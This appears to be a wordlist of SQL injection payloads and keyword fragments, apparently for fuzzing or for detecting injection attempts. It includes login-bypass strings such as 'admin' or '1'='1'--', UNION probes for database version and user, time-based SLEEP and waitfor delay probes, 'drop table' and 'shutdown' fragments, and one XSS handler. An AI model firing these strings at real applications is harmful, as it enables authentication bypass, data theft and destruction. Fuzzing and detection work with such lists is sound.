or%201=1
cmd
select count(*),concat
select extractvalue(xmltype
UNION SELECT ALL FROM
UNION ALL SELECT NULL,NULL
1' and '
1 and
select*from
onload=alert(
?%27%20OR%20%271
select load_file
select extractvalue(xmltype
%27UNION%20SELECT%20%272
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
AND 1=0 UNION ALL SELECT
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
OR 1=1
OR 1=0
OR x=x
OR x=y
OR 1=1#
OR 1=0#
OR x=x#
OR x=y#
OR 1=1-- 
OR 1=0-- 
OR x=x-- 
OR x=y-- 
OR 3409=3409 AND ('pytW' LIKE 
AND 1=
AS INJECTX WHERE 
WHERE 1=1 AND
ORDER BY
RLIKE (SELECT (CASE WHEN
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
ELSE DROP FUNCTION
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
and (select substring(@@version,
sleep(5)#
) or pg_sleep
AND (SELECT * FROM 
or SLEEP(
waitfor delay
or benchmark(
pg_SLEEP(
AnD SLEEP(
AnD SLEEP
&&SLEEP(
SELECT * FROM (SELECT(SLEEP(
benchmark(3200,SHA1(
+ SLEEP(
RANDOMBLOB(
AND 2947=LIKE(
OR 2947=LIKE(
SLEEP(1)/*
ORDER BY SLEEP(
ORDER BY 1,SLEEP(
ORDER BY 1,SLEEP(5),BENCHMARK(
UNION ALL SELECT 1 
UNION SELECT @@VERSION
UNION ALL SELECT USER(
UNION ALL SELECT SLEEP(
UNION ALL SELECT USER()
UNION ALL SELECT @@VERSION,USER(
NULL,NULL
NULL,NULL,NULL
NULL,NULL,NULL,NULL
UNION ALL SELECT NULL 
AND 5650=CONVERT(INT
UNION&ALL SELECT 'INJ'||'ECT'||'XXX'
(SELECT MD5
drop table
drop+table
insert into
insert+into
group by
group+by
create table
create+table
bulk insert
bulk+insert
shutdown
union
having
declare
exec
@@hostname
@@tmpdir
is null
is+null
is not null
is+not+null
CONCAT
%40%40basedir
version%28,user(
user%28,system_user(
(,%28,)
